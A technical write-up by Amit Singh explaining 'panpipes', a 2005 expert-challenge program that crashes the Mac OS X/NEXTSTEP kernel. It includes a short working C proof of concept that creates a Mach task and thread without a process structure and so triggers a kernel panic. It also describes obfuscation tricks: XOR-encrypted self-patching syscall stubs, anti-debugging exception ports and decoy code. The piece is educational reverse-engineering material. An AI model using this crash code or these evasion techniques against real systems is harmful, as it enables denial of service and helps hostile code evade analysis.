The Construction of Panpipes

The Mac OS X Expert Challenge 2005.1


© Amit Singh. All Rights Reserved. Written in April 2005

As a program, panpipes has two primary goals: it triggers a kernel panic, and it attempts to hide its working through a set of "cloaking" measures. I created panpipes by haphazardly cutting, pasting, and modifying code from various programming examples in my forthcoming book. It is not a "pretty" program: neither visually nor semantically.

Panic Triggering

Perhaps the most intriguing aspect of the system flaw used by panpipes to trigger a kernel panic is the flaw's age. It has existed for well over ten years. NEXTSTEP, which is ancestral to Mac OS X, had the same issue, and the issue continues to exist in the current and upcoming versions of Mac OS X.

Contrary to popular belief, Mac OS X is not "powered by Unix". It supports Unix-like APIs and behavior through additional layers on top of a core system. Consider the relevant example of the process subsystem in Mac OS X. The runnable entity in the Mac OS X kernel is a Mach thread, which is further separated into a shuttle and an activation. Threads are contained in Mach tasks. BSD-style process abstraction is retrofitted by associating a process structure with each Mach task, among other things.

In Unix, the only way to create a new process is through the fork system call (or variant). In Mac OS X, tasks and threads are created and manipulated using Mach calls. Now, user programs typically do not deal with Mach tasks or threads directly. The Pthreads package in the system library creates Mach threads, but no user-space code typically creates Mach tasks. The BSD-style fork implementation in the kernel uses these Mach calls to create a task and a thread within that task. Additionally, it allocates and initializes a process structure that is associated with the task. From the standpoint of the caller of fork, all these operations occur atomically, with the Mach and BSD-style data structures remaining in sync. The problem is that Mach and BSD-style portions of the kernel do not remain in sync under certain user-exploitable circumstances.

The program shown in Figure 1 shows the core idea behind panpipes. It should compile and run on NEXTSTEP 3.x, causing a kernel panic. The version for Mac OS X 10.x will be slightly different. It creates a Mach task and Mach thread within that task, and attempts to resume the thread. This panics the system. Thus, the flaw is conceptually very simple: the sequence of calls made by panpipes creates a runnable thread in a task with no process structure. As soon as some code, typically in the Unix portions of the kernel, will attempt to access the process structure, you will get a kernel panic.

 
/*
 * Tested on NEXTSTEP 3.3
 */

#include <mach/mach.h>
#include <mach/message.h>

int
main(void)
{
    task_t child_task;
    thread_t a_thread;

    /* no error checking */

    (void)task_create(task_self(), TRUE, &child_task);
    (void)thread_create(child_task, &a_thread);

    /* no need to even thread_set_state(), etc. */

    (void)thread_resume(a_thread);
    /* panic */

    /*WILLNOTBEREACHED*/
    exit(0);
}

Figure 1. Panpipes in its simplest form (NEXTSTEP version)

Cloaking Measures

If panpipes were as simple as the program shown in Figure 1, it would be trivially easy to determine the cause for the panic it triggers. Since this was to be a challenge for the experts, I wished to increase the difficulty of both dynamically and statically analyzing panpipes. With this goal, I added certain cloaking measures to panpipes, as discussed below. As we will see later, some of these measures would prove to be inconsequential because an analyzer's approach will not trigger them.

Simplest cloaking measures

As a trivial measure, the panpipes executable is stripped of all symbols that are not needed for it to load and run correctly. Now, even a stripped dynamically linked executable generated from a program with no high-level language code will contain several symbols, as shown in Figure 2. These symbols are from the language runtime code in the executable.

$ cat empty.c main() {} $ gcc -o empty empty.c $ strip empty $ nm empty 00003000 D _NXArgc 00003004 D _NXArgv U ___keymgr_dwarf2_register_sections U ___keymgr_global 0000300c D ___progname U __cthread_init_routine U __dyld_register_func_for_add_image U __dyld_register_func_for_remove_image U __init_keymgr U __keymgr_get_and_lock_processwide_ptr U __keymgr_set_and_unlock_processwide_ptr ... 0000309c S _do_seqnos_mach_notify_send_once 00003008 D _environ U _errno U _exit U _free U _mach_init_routine 000030a0 S _receive_samples


Figure 2. Symbols in an empty program's Mach-O executable

The panpipes executable contains the symbols that are shown in Figure 2, and a few additional symbols that are shown in Figure 3.

U _IOIteratorNext U _IOObjectRelease U _IORegistryCreateIterator ... U _fork ... U _kIOMasterPortDefault ... U _memcpy U _pthread_create U _pthread_detach ...


Figure 3. Additional symbols in the panpipes executable

All symbols shown in Figure 3 except the last three are there for distraction. The four I/O Kit symbols constitute the I/O Kit red herring described later. The fork is to potentially distract somebody monitoring system call invocations. Since Mach-level task creation will normally be a result of a fork, I added a spurious fork invocation. Note that there will still be an inconsistent number of process-related function invocations as seen in the kernel, so this is not a particularly useful cloaking measure. The memcpy is a side-effect of my using some MIG-generated routines directly. Finally, pthread_create and pthread_detach are used by panpipes to set up an exception handler (see "Disabling Debugging").

Disabling debugging

Panpipes "disables" debugging in two steps. As an immediate measure, it sets its task's exception port to a nonsensical port. Any code before this step would still be debuggable, and any code after this step would cause the program to "hang" in user-space. Meanwhile in the second step, panpipes establishes a full-fledged exception handler that waits for exceptions to arrive. However, as part of its exception processing, the handler itself triggers the panic. Once the handler thread is active, panpipes changes the task's exception port from its existing nonsensical value to that it allocated for the handler.

Thus, from a debugging standpoint, panpipes has three types of code:

PT_DENY_ATTACH or not?

I considered adding a call to ptrace with a PT_DENY_ATTACH request. This request causes the calling process to exit unceremoniously with an ENOTSUP error if it is run under a debugger (that is, if the P_TRACED flag is set in the proc structure). I decided against it, however, assuming that the consequential error message in the debugger would be tell-tale to experts. Besides, this measure is easily circumvented in several ways. An example of an Apple program using PT_DENY_ATTACH is iTunes, as shown in Figure 4.

$ gdb /Applications/iTunes.app/Contents/MacOS/iTunes ... Reading symbols for shared libraries ............... done (gdb) run Starting program: /Applications/iTunes.app/Contents/MacOS/iTunes ... Program exited with code 055. (gdb)


Figure 4. The Use of PT_DENY_ATTACH in iTunes

An "encrypted" system call stub for ptrace can still be found within panpipes.

Hiding use of Mach routines

For obvious reasons, I did not wish to have the tell-tale Mach functions used for disabling debugging show up as dynamically resolved symbols in the program. An extremely crude approach would be to either statically link in the entire system library, or at least extract the needed functions from the system library and use the object code. I might have done the latter, if it were not too much grunt work.

Breaking down the problem into parts led to a solution that not only required less work, but was a better solution too. I considered that the program would need to use Mach traps and MIG-generated routines, with the MIG-generated routines themselves resorting to Mach traps eventually. Therefore, I simply grep'ed the necessary MIG routine specifications from the appropriate files to create my own MIG specification files. I used the skip statement to account for the routines I did not need and thus did not include. This gave me my Mach functions without enormously bloating the program. However, I still needed to do something about the Mach traps that would be used by the MIG-generated routines.

Hiding use of Mach traps

Apple does not support static linking for user-space programs. Thus, normal programs always go through dynamic libraries. In particular, besides a few direct invocations of the PowerPC system call (sc) instruction courtesy of the language runtime, a normal program does not include any sc instructions. Calling Mach traps directly would cause sc instructions to appear in panpipes, thus ringing giant alarm bells during a static analysis.

I decided to use simple-minded dynamic instruction patching to hide my use of Mach traps. All traps used by panpipes initially exist as random assembly code in the object file, as shown in Figure 5. Note that the instructions are utterly nonsensical at this point.

.text .align 2 .globl _stub_mach_reply_port _stub_mach_reply_port: mflr r0 stmw r30,-8(r1) stw r0,8(r1) stwu r1,-80(r1) ... .align 2 .globl _stub_mach_msg_trap _stub_mach_msg_trap: lwz r0,104(r30) mullw r2,r2,r0 stw r2,56(r30) li r0,1 .align 2 .globl _stub_mach_msg_overwrite_trap _stub_mach_msg_overwrite_trap: stw r0,56(r30) mr r3,r0 lwz r1,0(r1) lwz r0,8(r1) ...


Figure 5. Implementing stubs for Mach traps

panpipes replaces the useless instructions in trap stubs by useful instructions at runtime. However, it does not store the corresponding instruction payload as is in a data section: it uses "encryption" (merely an exclusive OR operation) to attempt to foil a somewhat more determined static analysis.

 
#define I_BLR           0x4e800020
#define I_NOP i         0x60000000
#define I_SC            0x44000002

#define ABCDABCD        0x7ffefb78
#define BADDBADD        0x397e0040
#define BADDCAFE        0x9421ffb0
#define CAFEBABE        0x80210000
#define CAFECAFE        0x7c0803a6
#define DEADBEEF        0xbbc1fff8
#define F00FF00F        0x7c200b78
#define FEEDF00D        0x917e0020
#define FEEDFACE        0x38600000

typedef struct {
    u_int32_t pos;
    u_int32_t enc;
    u_int32_t key;
} e_instruction_t;

e_instruction_t
CODE_mach_reply_port[] = {
    { 1, (I_SC ^ F00FF00F),       F00FF00F },
    { 0, (0x3800ffe6 ^ CAFEBABE), CAFEBABE },
    { 3, (I_NOP ^ FEEDF00D),      FEEDF00D },
    { 2, (I_BLR ^ CAFECAFE),      CAFECAFE },
};

...
Figure 6. Dynamic instruction patching

Note in Figure 5 that each stub has a fixed size of four instructions. As shown in Figure 6, a CODE_trap_name array contains instruction generating formulas for the trap trap_name. Each formula is a structure of type e_instruction_t, with the following meanings for its fields: the final instruction at position pos is an exclusive OR of enc with key. While this sounds cumbersome to debug, it will not be a stumbling block as long as you realize that you do not need to decipher the "encryption" at all. If you set a breakpoint within an appropriate range of addresses in the code, instruction "decryption" would have already completed, and you would have the actual instructions in memory, whence they can be easily examined with a debugger. A related simplifying factor is that all stubs are adjacent in memory, so if you get one, you are likely to get them all.

There are few other steps required in this cloaking measure, but for dynamic instruction patching itself to work, rather than to thwart analysis.

First, the __TEXT segment in a Mach-O executable is marked as read-only: it has an initprot value of 5 (VM_PROT_READ|VM_PROT_EXECUTE), and a maxprot value of 7 (VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE). Rather than complicating panpipes further by adding calls to dynamically change memory protection values, I simply edited the panpipes binary manually after compilation to change the initprot value to 7. Thus, dyld loads panpipes with a writable __TEXT segment. The resulting abnormality is observable via the otool command.

Secondly, panpipes patches instructions "correctly" in that it uses the necessary set of dcbf, sync, icbi, and isync instructions. These instructions are plainly visible in panpipes, and I expected this to be an important hint.

Removing symbols for MIG support functions

My explicit use of MIG-generated client code resulted in panpipes requiring the mig_put_reply_port, mig_dealloc_reply_port, and mig_get_reply_port functions. These functions are not called directly by programs, and thus it was desirable to hide their use. If they showed up in the output of nm, for example, it would be a clear indication that panpipes may be calling low-level Mach functions. The first two functions can have dummy (empty) implementations without affecting panpipes' panic induction. mig_get_reply_port can be a trivial wrapper around the mach_reply_port Mach trap, although its normal implementation is more complicated.

 
void
mig_put_reply_port(mach_port_t reply_port)
{
}

void mig_dealloc_reply_port(mach_port_t reply_port)
{
}

mach_port_t
mig_get_reply_port()
{
    return stub_mach_reply_port();
}

Figure 7. Implementing MIG support functions

Pre-main setup

Panpipes uses a pre-main constructor function implemented using the constructor attribute that is supported by GCC. The constructor performs the actions shown in Figure 8. Constructor functions are automatically called just before main starts executing. In a Mach-O object file, constructor functions live in a section called __mod_init_func. The complete "path" to this section is LC_SEGMENT.__DATA.__mod_init_func.

 
void constructor(void) __attribute__ ((constructor));

void
constructor(void)
{
    // 1. Set up stubs for ptrace(), mach_task_self(),
    // mach_reply_port(), and mach_msg_trap().

    /* Until this point, you can debug normally. */

    // 2. Set the task's kernel port as its exception port

    /* Here onwards, debugging will hang the program. */

    // 3. Set up stubs for mach_msg_overwrite_trap(),
    // mach_thread_self(), and exit().

    // 4. Allocate a new port to be used as the task's exception
    // port, insert the appropriate rights, create a pthread to
    // run the exception handler, detach it, and set the new
    // port as the task's exception port.

    /* Here onwards, debugging will cause a panic. */

    // Now main() can run
}
...
Figure 8. Pre-main setup

The presence and locations of such constructor functions can be determined in multiple ways, both statically and dynamically. For example, you can use otool to display the relevant details.

The I/O Kit red herring

I had mistakenly pasted a selection containing some I/O Kit code into my program, and decided to let it stay as a potential distracter. As shown in Figure 9, I modified the code to be nonsensical, and it is never even called (the kernel panics before thread_exit can execute). However, its "benefits" include:

Even though it is a naïve measure, the I/O Kit red herring proved to be effective, leading many to believe that panpipes is "messing with a device".

 
#include <IOKit/IOKitLib.h>

void
thread_exit(void)
{
    IORegistryCreateIterator(kIOMasterPortDefault,
                             kIOServicePlane,
                             kIORegistryIterateRecursively,
                             stub_mach_task_self());

    while (IOIteratorNext(stub_mach_task_self())) {
        IOObjectRelease(stub_mach_task_self());
    }

    exit(0);
}

Figure 9. The I/O Kit Red Herring


Amit Singh